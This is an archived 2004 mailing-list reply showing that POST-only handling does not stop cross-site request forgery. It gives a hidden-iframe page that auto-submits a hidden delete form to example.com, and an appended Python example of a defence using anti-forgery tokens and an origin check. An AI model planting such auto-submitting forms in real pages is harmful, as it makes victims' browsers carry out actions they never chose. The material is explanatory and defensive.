mike bayer
mike_mp at zzzcomputing.com
Fri Sep 3 17:26:39 EDT 2004
> On Friday 03 September 2004 20:35, David Fraser wrote:
>
> > If you don't use the query string parameters when you are expecting POST
> > variables, then your users are not susceptible to this form of attack.

sadly, not true:

<IFRAME width="0" height="0" src="myattack.html"></IFRAME>

myattack.html:

<body onload="myform.submit()">
<form name="myform" method="POST" action="http://www.example.com/script">
<input type="hidden" name="deletesomething" value="true">
</form>
</body>
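Added example, not part of this thread: the server-side countermeasure that the hidden-iframe POST above cannot defeat is a per-session anti-forgery token. The legitimate form on www.example.com carries the token in a hidden field; a page on another origin can submit a POST to /script but cannot read the token, so the forged request arrives without it and is rejected. The handler below is hypothetical (the names `handle_request`, `issue_csrf_token`, `verify_csrf_token`, `SITE_ORIGIN` and the constructed `SECRET_KEY` are this example's own, not mod_python's); it also checks the Origin/Referer header, which a browser stamps with the attacker page's origin, as a second layer.

```python
import hmac
import hashlib
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed values for this example. A real deployment loads the key from
# configuration and keeps it out of source control.
SECRET_KEY = b"example-server-secret-32-bytes-long!!"
SITE_ORIGIN = "http://www.example.com"  # origin of the /script action in the thread


def issue_csrf_token(session_id: str) -> str:
    """Mint a token bound to the caller's session.

    Layout: "<nonce>.<HMAC-SHA256(secret, session_id ':' nonce)>". The server
    embeds it as a hidden field in every legitimate form; a page on another
    origin cannot read it, so a forged form has nothing valid to send.
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def same_origin(url: str) -> bool:
    """True only if scheme and host:port match SITE_ORIGIN exactly
    (a plain prefix test would accept www.example.com.attacker.invalid)."""
    got, want = urlsplit(url), urlsplit(SITE_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def handle_request(method: str, headers: dict, body: str, session_id: str):
    """Hypothetical handler for /script. Returns (status, message).

    Refusing GET is necessary but, as the thread shows, not sufficient: the
    hidden iframe submits a genuine POST. The origin check and the anti-forgery
    token are what actually stop it.
    """
    if method != "POST":
        return 405, "state-changing action requires POST"

    # A POST auto-submitted from the attacker's page carries that page's
    # origin in Origin (or Referer), not ours.
    source = headers.get("Origin") or headers.get("Referer") or ""
    if not same_origin(source):
        return 403, "cross-origin request rejected"

    form = {k: v[0] for k, v in parse_qs(body).items()}
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return 403, "missing or invalid anti-forgery token"

    if form.get("deletesomething") == "true":
        return 200, "deleted"
    return 400, "nothing to do"


if __name__ == "__main__":
    sid = "session-abc"  # constructed session identifier
    # Body exactly as the hidden form in the thread would submit it: no token.
    forged = handle_request("POST", {"Origin": "http://attacker.invalid"}, "deletesomething=true", sid)
    token = issue_csrf_token(sid)
    genuine = handle_request("POST", {"Origin": SITE_ORIGIN}, f"deletesomething=true&csrf_token={token}", sid)
    print("forged:", forged)
    print("genuine:", genuine)
```

The token is bound to the session rather than stored server-side, so no per-request state is needed; rotating the nonce per form keeps tokens from being reusable across sessions, and `compare_digest` avoids leaking the MAC through timing.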